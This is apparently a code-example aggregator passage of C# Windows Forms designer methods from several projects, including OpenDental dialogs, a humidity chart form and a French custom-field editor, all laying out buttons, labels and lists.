     this.butCancel.Text         = "&Cancel";
     this.butCancel.Click       += new System.EventHandler(this.butCancel_Click);
     //
     // butOK
     //
     this.butOK.AdjustImageLocation = new System.Drawing.Point(0, 0);
     this.butOK.Anchor       = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Right)));
     this.butOK.Autosize     = true;
     this.butOK.BtnShape     = OpenDental.UI.enumType.BtnShape.Rectangle;
     this.butOK.BtnStyle     = OpenDental.UI.enumType.XPStyle.Silver;
     this.butOK.CornerRadius = 4F;
     this.butOK.Location     = new System.Drawing.Point(186, 147);
     this.butOK.Name         = "butOK";
     this.butOK.Size         = new System.Drawing.Size(75, 24);
     this.butOK.TabIndex     = 1;
     this.butOK.Text         = "&OK";
     this.butOK.Click       += new System.EventHandler(this.butOK_Click);
     //
     // labelName
     //
     this.labelName.Location  = new System.Drawing.Point(19, 17);
     this.labelName.Name      = "labelName";
     this.labelName.Size      = new System.Drawing.Size(335, 20);
     this.labelName.TabIndex  = 3;
     this.labelName.Text      = "Field Name";
     this.labelName.TextAlign = System.Drawing.ContentAlignment.BottomLeft;
     //
     // textValue
     //
     this.textValue.Location  = new System.Drawing.Point(21, 40);
     this.textValue.Multiline = true;
     this.textValue.Name      = "textValue";
     this.textValue.Size      = new System.Drawing.Size(333, 74);
     this.textValue.TabIndex  = 0;
     //
     // butUseAutoNote
     //
     this.butUseAutoNote.AdjustImageLocation = new System.Drawing.Point(0, 0);
     this.butUseAutoNote.Anchor       = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)));
     this.butUseAutoNote.Autosize     = true;
     this.butUseAutoNote.BtnShape     = OpenDental.UI.enumType.BtnShape.Rectangle;
     this.butUseAutoNote.BtnStyle     = OpenDental.UI.enumType.XPStyle.Silver;
     this.butUseAutoNote.CornerRadius = 4F;
     this.butUseAutoNote.Location     = new System.Drawing.Point(21, 147);
     this.butUseAutoNote.Name         = "butUseAutoNote";
     this.butUseAutoNote.Size         = new System.Drawing.Size(75, 24);
     this.butUseAutoNote.TabIndex     = 4;
     this.butUseAutoNote.Text         = "Auto Note";
     this.butUseAutoNote.Visible      = false;
     this.butUseAutoNote.Click       += new System.EventHandler(this.butUseAutoNote_Click);
     //
     // FormPatFieldEdit
     //
     this.AcceptButton      = this.butOK;
     this.AutoScaleBaseSize = new System.Drawing.Size(5, 13);
     this.CancelButton      = this.butCancel;
     this.ClientSize        = new System.Drawing.Size(375, 193);
     this.Controls.Add(this.butUseAutoNote);
     this.Controls.Add(this.textValue);
     this.Controls.Add(this.labelName);
     this.Controls.Add(this.butOK);
     this.Controls.Add(this.butCancel);
     this.Icon          = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.MaximizeBox   = false;
     this.MinimizeBox   = false;
     this.Name          = "FormPatFieldEdit";
     this.ShowInTaskbar = false;
     this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text          = "Edit Patient Field";
     this.FormClosing  += new System.Windows.Forms.FormClosingEventHandler(this.FormPatFieldDefEdit_FormClosing);
     this.Load         += new System.EventHandler(this.FormPatFieldEdit_Load);
     this.ResumeLayout(false);
     this.PerformLayout();
 }
Example #34
0
 void SetIcon()
 {
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(BanUserForm));
     this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
 }
Example #35
0
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     this.components = new System.ComponentModel.Container();
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(ToolBoxLabelForm));
     this.labelNameLabel   = new System.Windows.Forms.Label();
     this.labelNameTextBox = new System.Windows.Forms.TextBox();
     this.EditOkButton     = new System.Windows.Forms.Button();
     this.EditCancelButton = new System.Windows.Forms.Button();
     this.toolTip          = new System.Windows.Forms.ToolTip(this.components);
     this.SuspendLayout();
     //
     // labelNameLabel
     //
     this.labelNameLabel.Location = new System.Drawing.Point(8, 8);
     this.labelNameLabel.Name     = "labelNameLabel";
     this.labelNameLabel.Size     = new System.Drawing.Size(100, 23);
     this.labelNameLabel.TabIndex = 0;
     this.labelNameLabel.Text     = "Label Name";
     //
     // labelNameTextBox
     //
     this.labelNameTextBox.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Left)
                                                                          | System.Windows.Forms.AnchorStyles.Right)));
     this.labelNameTextBox.Location = new System.Drawing.Point(8, 32);
     this.labelNameTextBox.Name     = "labelNameTextBox";
     this.labelNameTextBox.Size     = new System.Drawing.Size(384, 20);
     this.labelNameTextBox.TabIndex = 1;
     this.toolTip.SetToolTip(this.labelNameTextBox, "Type the Label name, as you would like for it to display...");
     //
     // EditOkButton
     //
     this.EditOkButton.Anchor    = System.Windows.Forms.AnchorStyles.Bottom;
     this.EditOkButton.FlatStyle = System.Windows.Forms.FlatStyle.System;
     this.EditOkButton.Location  = new System.Drawing.Point(116, 58);
     this.EditOkButton.Name      = "EditOkButton";
     this.EditOkButton.Size      = new System.Drawing.Size(72, 23);
     this.EditOkButton.TabIndex  = 6;
     this.EditOkButton.Text      = "OK";
     this.EditOkButton.Click    += new System.EventHandler(this.EditOkButton_Click);
     //
     // EditCancelButton
     //
     this.EditCancelButton.Anchor       = System.Windows.Forms.AnchorStyles.Bottom;
     this.EditCancelButton.DialogResult = System.Windows.Forms.DialogResult.Cancel;
     this.EditCancelButton.FlatStyle    = System.Windows.Forms.FlatStyle.System;
     this.EditCancelButton.Location     = new System.Drawing.Point(204, 58);
     this.EditCancelButton.Name         = "EditCancelButton";
     this.EditCancelButton.Size         = new System.Drawing.Size(72, 23);
     this.EditCancelButton.TabIndex     = 5;
     this.EditCancelButton.Text         = "Cancel";
     //
     // ToolBoxLabelForm
     //
     this.AcceptButton      = this.EditOkButton;
     this.AutoScaleBaseSize = new System.Drawing.Size(5, 13);
     this.CancelButton      = this.EditCancelButton;
     this.ClientSize        = new System.Drawing.Size(400, 86);
     this.Controls.Add(this.EditOkButton);
     this.Controls.Add(this.EditCancelButton);
     this.Controls.Add(this.labelNameTextBox);
     this.Controls.Add(this.labelNameLabel);
     this.Icon          = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.KeyPreview    = true;
     this.MaximumSize   = new System.Drawing.Size(408, 120);
     this.MinimumSize   = new System.Drawing.Size(408, 120);
     this.Name          = "ToolBoxLabelForm";
     this.StartPosition = System.Windows.Forms.FormStartPosition.CenterParent;
     this.Text          = "Create/Edit Label";
     this.ResumeLayout(false);
     this.PerformLayout();
 }
Example #36
0
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     this.components = new System.ComponentModel.Container();
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(HumidityChartForm));
     this.mainMenu                       = new System.Windows.Forms.MainMenu(this.components);
     this.menuItemClose                  = new System.Windows.Forms.MenuItem();
     this.radioButtonProcess             = new System.Windows.Forms.RadioButton();
     this.radioButtonState               = new System.Windows.Forms.RadioButton();
     this.groupBoxHumidityChartType      = new System.Windows.Forms.GroupBox();
     this.groupBoxHumidityChartParameter = new System.Windows.Forms.GroupBox();
     this.panel = new System.Windows.Forms.Panel();
     this.textBoxPressureValue = new ProsimoUI.ProcessVarTextBox();
     this.labelPressureName    = new ProsimoUI.ProcessVarLabel();
     this.plotCtrl             = new ProsimoUI.Plots.HCPlotControl();
     this.groupBoxHumidityChartType.SuspendLayout();
     this.groupBoxHumidityChartParameter.SuspendLayout();
     this.panel.SuspendLayout();
     this.SuspendLayout();
     //
     // mainMenu
     //
     this.mainMenu.MenuItems.AddRange(new System.Windows.Forms.MenuItem[] {
         this.menuItemClose
     });
     //
     // menuItemClose
     //
     this.menuItemClose.Index  = 0;
     this.menuItemClose.Text   = "Close";
     this.menuItemClose.Click += new System.EventHandler(this.menuItemClose_Click);
     //
     // radioButtonProcess
     //
     this.radioButtonProcess.Location        = new System.Drawing.Point(18, 45);
     this.radioButtonProcess.Name            = "radioButtonProcess";
     this.radioButtonProcess.Size            = new System.Drawing.Size(129, 20);
     this.radioButtonProcess.TabIndex        = 11;
     this.radioButtonProcess.Text            = "Isenthalpic Process";
     this.radioButtonProcess.CheckedChanged += new System.EventHandler(this.radioButtonProcess_CheckedChanged);
     //
     // radioButtonState
     //
     this.radioButtonState.Location        = new System.Drawing.Point(18, 19);
     this.radioButtonState.Name            = "radioButtonState";
     this.radioButtonState.Size            = new System.Drawing.Size(120, 20);
     this.radioButtonState.TabIndex        = 10;
     this.radioButtonState.Text            = "Gas State";
     this.radioButtonState.CheckedChanged += new System.EventHandler(this.radioButtonState_CheckedChanged);
     //
     // groupBoxHumidityChartType
     //
     this.groupBoxHumidityChartType.Controls.Add(this.radioButtonProcess);
     this.groupBoxHumidityChartType.Controls.Add(this.radioButtonState);
     this.groupBoxHumidityChartType.Location = new System.Drawing.Point(4, 12);
     this.groupBoxHumidityChartType.Name     = "groupBoxHumidityChartType";
     this.groupBoxHumidityChartType.Size     = new System.Drawing.Size(207, 80);
     this.groupBoxHumidityChartType.TabIndex = 16;
     this.groupBoxHumidityChartType.TabStop  = false;
     this.groupBoxHumidityChartType.Text     = "Chart Type";
     //
     // groupBoxHumidityChartParameter
     //
     this.groupBoxHumidityChartParameter.Controls.Add(this.textBoxPressureValue);
     this.groupBoxHumidityChartParameter.Controls.Add(this.labelPressureName);
     this.groupBoxHumidityChartParameter.Location = new System.Drawing.Point(4, 98);
     this.groupBoxHumidityChartParameter.Name     = "groupBoxHumidityChartParameter";
     this.groupBoxHumidityChartParameter.Size     = new System.Drawing.Size(207, 52);
     this.groupBoxHumidityChartParameter.TabIndex = 17;
     this.groupBoxHumidityChartParameter.TabStop  = false;
     this.groupBoxHumidityChartParameter.Text     = "Chart Parameter";
     //
     // panel
     //
     this.panel.AutoScroll  = true;
     this.panel.BorderStyle = System.Windows.Forms.BorderStyle.Fixed3D;
     this.panel.Controls.Add(this.groupBoxHumidityChartType);
     this.panel.Controls.Add(this.groupBoxHumidityChartParameter);
     this.panel.Controls.Add(this.plotCtrl);
     this.panel.Location = new System.Drawing.Point(0, 0);
     this.panel.Name     = "panel";
     this.panel.Size     = new System.Drawing.Size(977, 464);
     this.panel.TabIndex = 19;
     //
     // textBoxPressureValue
     //
     this.textBoxPressureValue.Location  = new System.Drawing.Point(115, 24);
     this.textBoxPressureValue.Name      = "textBoxPressureValue";
     this.textBoxPressureValue.Size      = new System.Drawing.Size(80, 20);
     this.textBoxPressureValue.TabIndex  = 10;
     this.textBoxPressureValue.TextAlign = System.Windows.Forms.HorizontalAlignment.Right;
     this.textBoxPressureValue.KeyUp    += new System.Windows.Forms.KeyEventHandler(this.textBoxPressureValue_KeyUp);
     //
     // labelPressureName
     //
     this.labelPressureName.BorderStyle = System.Windows.Forms.BorderStyle.Fixed3D;
     this.labelPressureName.Location    = new System.Drawing.Point(4, 24);
     this.labelPressureName.Name        = "labelPressureName";
     this.labelPressureName.Size        = new System.Drawing.Size(104, 20);
     this.labelPressureName.TabIndex    = 9;
     this.labelPressureName.Text        = "Pressure";
     this.labelPressureName.TextAlign   = System.Drawing.ContentAlignment.MiddleLeft;
     //
     // plotCtrl
     //
     this.plotCtrl.Location = new System.Drawing.Point(376, 4);
     this.plotCtrl.Name     = "plotCtrl";
     this.plotCtrl.Size     = new System.Drawing.Size(596, 456);
     this.plotCtrl.TabIndex = 18;
     //
     // HumidityChartForm
     //
     this.ClientSize = new System.Drawing.Size(977, 464);
     this.Controls.Add(this.panel);
     this.Icon          = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.MaximizeBox   = false;
     this.Menu          = this.mainMenu;
     this.MinimizeBox   = false;
     this.Name          = "HumidityChartForm";
     this.ShowInTaskbar = false;
     this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
     //this.Text = "Humidity Chart";
     this.groupBoxHumidityChartType.ResumeLayout(false);
     this.groupBoxHumidityChartParameter.ResumeLayout(false);
     this.groupBoxHumidityChartParameter.PerformLayout();
     this.panel.ResumeLayout(false);
     this.ResumeLayout(false);
 }
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormRpReceivablesBreakdown));
     this.butCancel         = new OpenDental.UI.Button();
     this.butOK             = new OpenDental.UI.Button();
     this.date1             = new System.Windows.Forms.MonthCalendar();
     this.label1            = new System.Windows.Forms.Label();
     this.listProv          = new System.Windows.Forms.ListBox();
     this.labelProvider     = new System.Windows.Forms.Label();
     this.listClinic        = new System.Windows.Forms.ListBox();
     this.labClinic         = new System.Windows.Forms.Label();
     this.groupInsBox       = new System.Windows.Forms.GroupBox();
     this.radioWriteoffProc = new System.Windows.Forms.RadioButton();
     this.radioWriteoffPay  = new System.Windows.Forms.RadioButton();
     this.label2            = new System.Windows.Forms.Label();
     this.groupInsBox.SuspendLayout();
     this.SuspendLayout();
     //
     // butCancel
     //
     this.butCancel.AdjustImageLocation = new System.Drawing.Point(0, 0);
     this.butCancel.Anchor       = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Right)));
     this.butCancel.Autosize     = true;
     this.butCancel.BtnShape     = OpenDental.UI.enumType.BtnShape.Rectangle;
     this.butCancel.BtnStyle     = OpenDental.UI.enumType.XPStyle.Silver;
     this.butCancel.CornerRadius = 4F;
     this.butCancel.DialogResult = System.Windows.Forms.DialogResult.Cancel;
     this.butCancel.Location     = new System.Drawing.Point(468, 286);
     this.butCancel.Name         = "butCancel";
     this.butCancel.Size         = new System.Drawing.Size(75, 26);
     this.butCancel.TabIndex     = 3;
     this.butCancel.Text         = "&Cancel";
     //
     // butOK
     //
     this.butOK.AdjustImageLocation = new System.Drawing.Point(0, 0);
     this.butOK.Anchor       = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Right)));
     this.butOK.Autosize     = true;
     this.butOK.BtnShape     = OpenDental.UI.enumType.BtnShape.Rectangle;
     this.butOK.BtnStyle     = OpenDental.UI.enumType.XPStyle.Silver;
     this.butOK.CornerRadius = 4F;
     this.butOK.Location     = new System.Drawing.Point(378, 286);
     this.butOK.Name         = "butOK";
     this.butOK.Size         = new System.Drawing.Size(75, 26);
     this.butOK.TabIndex     = 2;
     this.butOK.Text         = "&OK";
     this.butOK.Click       += new System.EventHandler(this.butOK_Click);
     //
     // date1
     //
     this.date1.Location = new System.Drawing.Point(317, 56);
     this.date1.Name     = "date1";
     this.date1.TabIndex = 4;
     //
     // label1
     //
     this.label1.Location  = new System.Drawing.Point(314, 37);
     this.label1.Name      = "label1";
     this.label1.Size      = new System.Drawing.Size(230, 16);
     this.label1.TabIndex  = 5;
     this.label1.Text      = "Up to the following date";
     this.label1.TextAlign = System.Drawing.ContentAlignment.BottomLeft;
     //
     // listProv
     //
     this.listProv.Location      = new System.Drawing.Point(27, 58);
     this.listProv.Name          = "listProv";
     this.listProv.SelectionMode = System.Windows.Forms.SelectionMode.MultiExtended;
     this.listProv.Size          = new System.Drawing.Size(126, 147);
     this.listProv.TabIndex      = 30;
     //
     // labelProvider
     //
     this.labelProvider.Location  = new System.Drawing.Point(24, 39);
     this.labelProvider.Name      = "labelProvider";
     this.labelProvider.Size      = new System.Drawing.Size(103, 16);
     this.labelProvider.TabIndex  = 7;
     this.labelProvider.Text      = "Providers";
     this.labelProvider.TextAlign = System.Drawing.ContentAlignment.BottomLeft;
     //
     // listClinic
     //
     this.listClinic.FormattingEnabled = true;
     this.listClinic.Location          = new System.Drawing.Point(171, 58);
     this.listClinic.Name          = "listClinic";
     this.listClinic.SelectionMode = System.Windows.Forms.SelectionMode.MultiExtended;
     this.listClinic.Size          = new System.Drawing.Size(126, 147);
     this.listClinic.TabIndex      = 31;
     //
     // labClinic
     //
     this.labClinic.Location  = new System.Drawing.Point(171, 39);
     this.labClinic.Name      = "labClinic";
     this.labClinic.Size      = new System.Drawing.Size(103, 16);
     this.labClinic.TabIndex  = 32;
     this.labClinic.Text      = "Clinic";
     this.labClinic.TextAlign = System.Drawing.ContentAlignment.BottomLeft;
     //
     // groupInsBox
     //
     this.groupInsBox.Controls.Add(this.radioWriteoffProc);
     this.groupInsBox.Controls.Add(this.radioWriteoffPay);
     this.groupInsBox.Location = new System.Drawing.Point(27, 217);
     this.groupInsBox.Name     = "groupInsBox";
     this.groupInsBox.Size     = new System.Drawing.Size(270, 66);
     this.groupInsBox.TabIndex = 33;
     this.groupInsBox.TabStop  = false;
     this.groupInsBox.Text     = "Show Insurance Writeoffs";
     //
     // radioWriteoffProc
     //
     this.radioWriteoffProc.Location = new System.Drawing.Point(7, 38);
     this.radioWriteoffProc.Name     = "radioWriteoffProc";
     this.radioWriteoffProc.Size     = new System.Drawing.Size(199, 17);
     this.radioWriteoffProc.TabIndex = 1;
     this.radioWriteoffProc.TabStop  = true;
     this.radioWriteoffProc.Text     = "Using procedure date.";
     this.radioWriteoffProc.UseVisualStyleBackColor = true;
     //
     // radioWriteoffPay
     //
     this.radioWriteoffPay.Location = new System.Drawing.Point(7, 20);
     this.radioWriteoffPay.Name     = "radioWriteoffPay";
     this.radioWriteoffPay.Size     = new System.Drawing.Size(240, 17);
     this.radioWriteoffPay.TabIndex = 0;
     this.radioWriteoffPay.TabStop  = true;
     this.radioWriteoffPay.Text     = "Using insurance payment date.";
     this.radioWriteoffPay.UseVisualStyleBackColor = true;
     //
     // label2
     //
     this.label2.Location = new System.Drawing.Point(24, 9);
     this.label2.Name     = "label2";
     this.label2.Size     = new System.Drawing.Size(519, 20);
     this.label2.TabIndex = 34;
     this.label2.Text     = "This report does not take payment plans into account if you are not using Line-It" +
                            "em Payment Plans.";
     //
     // FormRpReceivablesBreakdown
     //
     this.AcceptButton = this.butOK;
     this.CancelButton = this.butCancel;
     this.ClientSize   = new System.Drawing.Size(567, 324);
     this.Controls.Add(this.label2);
     this.Controls.Add(this.groupInsBox);
     this.Controls.Add(this.labClinic);
     this.Controls.Add(this.listClinic);
     this.Controls.Add(this.labelProvider);
     this.Controls.Add(this.listProv);
     this.Controls.Add(this.label1);
     this.Controls.Add(this.date1);
     this.Controls.Add(this.butCancel);
     this.Controls.Add(this.butOK);
     this.Icon          = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.MaximizeBox   = false;
     this.MinimizeBox   = false;
     this.Name          = "FormRpReceivablesBreakdown";
     this.ShowInTaskbar = false;
     this.Text          = "Receivables Breakdown";
     this.Load         += new System.EventHandler(this.FormRpReceivablesBreakdown_Load);
     this.groupInsBox.ResumeLayout(false);
     this.ResumeLayout(false);
 }
Example #38
0
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(Form1));
     this.appManager1 = new DotSpatial.Controls.AppManager();
     this.SuspendLayout();
     //
     // appManager1
     //
     this.appManager1.Directories     = ((System.Collections.Generic.List <string>)(resources.GetObject("appManager1.Directories")));
     this.appManager1.DockManager     = null;
     this.appManager1.HeaderControl   = null;
     this.appManager1.Legend          = null;
     this.appManager1.Map             = null;
     this.appManager1.ProgressHandler = null;
     //
     // Form1
     //
     this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
     this.AutoScaleMode       = System.Windows.Forms.AutoScaleMode.Font;
     this.ClientSize          = new System.Drawing.Size(828, 550);
     this.Name = "Form1";
     this.Text = "Form1";
     this.ResumeLayout(false);
 }
 /// <summary>
 /// Méthode requise pour la prise en charge du concepteur - ne modifiez pas
 /// le contenu de cette méthode avec l'éditeur de code.
 /// </summary>
 private void InitializeComponent()
 {
     sc2i.win32.common.GLColumn glColumn1 = new sc2i.win32.common.GLColumn();
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(CFormEditOrigineChampCustom));
     this.c2iPanelOmbre1   = new sc2i.win32.common.C2iPanelOmbre();
     this.label1           = new System.Windows.Forms.Label();
     this.m_wndListeChamps = new sc2i.win32.common.GlacialList();
     this.label2           = new System.Windows.Forms.Label();
     this.panel1           = new System.Windows.Forms.Panel();
     this.m_btnAnnuler     = new System.Windows.Forms.Button();
     this.m_btnOk          = new System.Windows.Forms.Button();
     this.splitter1        = new System.Windows.Forms.Splitter();
     this.m_ExtStyle1      = new sc2i.win32.common.CExtStyle();
     this.c2iPanelOmbre1.SuspendLayout();
     this.panel1.SuspendLayout();
     this.SuspendLayout();
     //
     // c2iPanelOmbre1
     //
     this.c2iPanelOmbre1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
                                                                         | System.Windows.Forms.AnchorStyles.Left)
                                                                        | System.Windows.Forms.AnchorStyles.Right)));
     this.c2iPanelOmbre1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(189)))), ((int)(((byte)(189)))), ((int)(((byte)(255)))));
     this.c2iPanelOmbre1.Controls.Add(this.label1);
     this.c2iPanelOmbre1.Controls.Add(this.m_wndListeChamps);
     this.c2iPanelOmbre1.Controls.Add(this.label2);
     this.c2iPanelOmbre1.Location    = new System.Drawing.Point(8, 8);
     this.c2iPanelOmbre1.LockEdition = false;
     this.c2iPanelOmbre1.Name        = "c2iPanelOmbre1";
     this.c2iPanelOmbre1.Size        = new System.Drawing.Size(446, 258);
     this.m_ExtStyle1.SetStyleBackColor(this.c2iPanelOmbre1, sc2i.win32.common.CExtStyle.EnumCouleurs.ColorFondPanel);
     this.m_ExtStyle1.SetStyleForeColor(this.c2iPanelOmbre1, sc2i.win32.common.CExtStyle.EnumCouleurs.None);
     this.c2iPanelOmbre1.TabIndex = 18;
     //
     // label1
     //
     this.label1.Font     = new System.Drawing.Font("Microsoft Sans Serif", 8.25F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.label1.Location = new System.Drawing.Point(8, 8);
     this.label1.Name     = "label1";
     this.label1.Size     = new System.Drawing.Size(328, 16);
     this.m_ExtStyle1.SetStyleBackColor(this.label1, sc2i.win32.common.CExtStyle.EnumCouleurs.None);
     this.m_ExtStyle1.SetStyleForeColor(this.label1, sc2i.win32.common.CExtStyle.EnumCouleurs.None);
     this.label1.TabIndex = 0;
     this.label1.Text     = "Custom fields|20000";
     //
     // m_wndListeChamps
     //
     this.m_wndListeChamps.AllowColumnResize   = true;
     this.m_wndListeChamps.AllowMultiselect    = false;
     this.m_wndListeChamps.AlternateBackground = System.Drawing.Color.DarkGreen;
     this.m_wndListeChamps.AlternatingColors   = false;
     this.m_wndListeChamps.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
                                                                          | System.Windows.Forms.AnchorStyles.Left)));
     this.m_wndListeChamps.AutoHeight = true;
     this.m_wndListeChamps.AutoSort   = false;
     this.m_wndListeChamps.BackColor  = System.Drawing.SystemColors.ControlLightLight;
     this.m_wndListeChamps.CanChangeActivationCheckBoxes = false;
     this.m_wndListeChamps.CheckBoxes = false;
     glColumn1.ActiveControlItems     = ((System.Collections.ArrayList)(resources.GetObject("glColumn1.ActiveControlItems")));
     glColumn1.BackColor     = System.Drawing.Color.Transparent;
     glColumn1.ControlType   = sc2i.win32.common.ColumnControlTypes.None;
     glColumn1.ForColor      = System.Drawing.Color.Black;
     glColumn1.ImageIndex    = -1;
     glColumn1.IsCheckColumn = false;
     glColumn1.LastSortState = sc2i.win32.common.ColumnSortState.SortedUp;
     glColumn1.Name          = "Field";
     glColumn1.Propriete     = "Nom";
     glColumn1.Text          = "Field|60";
     glColumn1.TextAlignment = System.Drawing.ContentAlignment.MiddleLeft;
     glColumn1.Width         = 200;
     this.m_wndListeChamps.Columns.AddRange(new sc2i.win32.common.GLColumn[] {
         glColumn1
     });
     this.m_wndListeChamps.ContexteUtilisation = "";
     this.m_wndListeChamps.EnableCustomisation = false;
     this.m_wndListeChamps.FocusedItem         = null;
     this.m_wndListeChamps.FullRowSelect       = true;
     this.m_wndListeChamps.GLGridLines         = sc2i.win32.common.GLGridStyles.gridSolid;
     this.m_wndListeChamps.GridColor           = System.Drawing.SystemColors.ControlLight;
     this.m_wndListeChamps.HeaderHeight        = 22;
     this.m_wndListeChamps.HeaderStyle         = sc2i.win32.common.GLHeaderStyles.Normal;
     this.m_wndListeChamps.HeaderTextColor     = System.Drawing.Color.Black;
     this.m_wndListeChamps.HeaderTextFont      = new System.Drawing.Font("Microsoft Sans Serif", 8F);
     this.m_wndListeChamps.HeaderVisible       = true;
     this.m_wndListeChamps.HeaderWordWrap      = false;
     this.m_wndListeChamps.HotColumnIndex      = -1;
     this.m_wndListeChamps.HotItemIndex        = -1;
     this.m_wndListeChamps.HotTracking         = false;
     this.m_wndListeChamps.HotTrackingColor    = System.Drawing.Color.LightGray;
     this.m_wndListeChamps.ImageList           = null;
     this.m_wndListeChamps.ItemHeight          = 17;
     this.m_wndListeChamps.ItemWordWrap        = false;
     this.m_wndListeChamps.ListeSource         = null;
     this.m_wndListeChamps.Location            = new System.Drawing.Point(11, 27);
     this.m_wndListeChamps.MaxHeight           = 17;
     this.m_wndListeChamps.Name = "m_wndListeChamps";
     this.m_wndListeChamps.SelectedTextColor = System.Drawing.Color.White;
     this.m_wndListeChamps.SelectionColor    = System.Drawing.Color.DarkBlue;
     this.m_wndListeChamps.ShowBorder        = true;
     this.m_wndListeChamps.ShowFocusRect     = true;
     this.m_wndListeChamps.Size      = new System.Drawing.Size(236, 205);
     this.m_wndListeChamps.SortIndex = 0;
     this.m_ExtStyle1.SetStyleBackColor(this.m_wndListeChamps, sc2i.win32.common.CExtStyle.EnumCouleurs.None);
     this.m_ExtStyle1.SetStyleForeColor(this.m_wndListeChamps, sc2i.win32.common.CExtStyle.EnumCouleurs.None);
     this.m_wndListeChamps.SuperFlatHeaderColor = System.Drawing.Color.White;
     this.m_wndListeChamps.TabIndex             = 3;
     this.m_wndListeChamps.Text = "glacialList1";
     this.m_wndListeChamps.TrierAuClicSurEnteteColonne = true;
     //
     // label2
     //
     this.label2.Font     = new System.Drawing.Font("Microsoft Sans Serif", 8.25F, System.Drawing.FontStyle.Italic, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.label2.Location = new System.Drawing.Point(253, 27);
     this.label2.Name     = "label2";
     this.label2.Size     = new System.Drawing.Size(168, 95);
     this.m_ExtStyle1.SetStyleBackColor(this.label2, sc2i.win32.common.CExtStyle.EnumCouleurs.None);
     this.m_ExtStyle1.SetStyleForeColor(this.label2, sc2i.win32.common.CExtStyle.EnumCouleurs.None);
     this.label2.TabIndex = 4;
     this.label2.Text     = "Check fields you want to add to the table|20001";
     //
     // panel1
     //
     this.panel1.Controls.Add(this.m_btnAnnuler);
     this.panel1.Controls.Add(this.m_btnOk);
     this.panel1.Controls.Add(this.splitter1);
     this.panel1.Controls.Add(this.c2iPanelOmbre1);
     this.panel1.Dock     = System.Windows.Forms.DockStyle.Fill;
     this.panel1.Location = new System.Drawing.Point(0, 0);
     this.panel1.Name     = "panel1";
     this.panel1.Size     = new System.Drawing.Size(462, 302);
     this.m_ExtStyle1.SetStyleBackColor(this.panel1, sc2i.win32.common.CExtStyle.EnumCouleurs.None);
     this.m_ExtStyle1.SetStyleForeColor(this.panel1, sc2i.win32.common.CExtStyle.EnumCouleurs.None);
     this.panel1.TabIndex = 20;
     //
     // m_btnAnnuler
     //
     this.m_btnAnnuler.Anchor       = System.Windows.Forms.AnchorStyles.Bottom;
     this.m_btnAnnuler.BackColor    = System.Drawing.SystemColors.Control;
     this.m_btnAnnuler.DialogResult = System.Windows.Forms.DialogResult.Cancel;
     this.m_btnAnnuler.Location     = new System.Drawing.Point(243, 272);
     this.m_btnAnnuler.Name         = "m_btnAnnuler";
     this.m_btnAnnuler.Size         = new System.Drawing.Size(80, 24);
     this.m_ExtStyle1.SetStyleBackColor(this.m_btnAnnuler, sc2i.win32.common.CExtStyle.EnumCouleurs.None);
     this.m_ExtStyle1.SetStyleForeColor(this.m_btnAnnuler, sc2i.win32.common.CExtStyle.EnumCouleurs.None);
     this.m_btnAnnuler.TabIndex = 22;
     this.m_btnAnnuler.Text     = "Cancel|11";
     this.m_btnAnnuler.UseVisualStyleBackColor = false;
     this.m_btnAnnuler.Click += new System.EventHandler(this.m_btnAnnuler_Click);
     //
     // m_btnOk
     //
     this.m_btnOk.Anchor    = System.Windows.Forms.AnchorStyles.Bottom;
     this.m_btnOk.BackColor = System.Drawing.SystemColors.Control;
     this.m_btnOk.Location  = new System.Drawing.Point(115, 272);
     this.m_btnOk.Name      = "m_btnOk";
     this.m_btnOk.Size      = new System.Drawing.Size(80, 24);
     this.m_ExtStyle1.SetStyleBackColor(this.m_btnOk, sc2i.win32.common.CExtStyle.EnumCouleurs.None);
     this.m_ExtStyle1.SetStyleForeColor(this.m_btnOk, sc2i.win32.common.CExtStyle.EnumCouleurs.None);
     this.m_btnOk.TabIndex = 21;
     this.m_btnOk.Text     = "Ok|10";
     this.m_btnOk.UseVisualStyleBackColor = false;
     this.m_btnOk.Click += new System.EventHandler(this.m_btnOk_Click);
     //
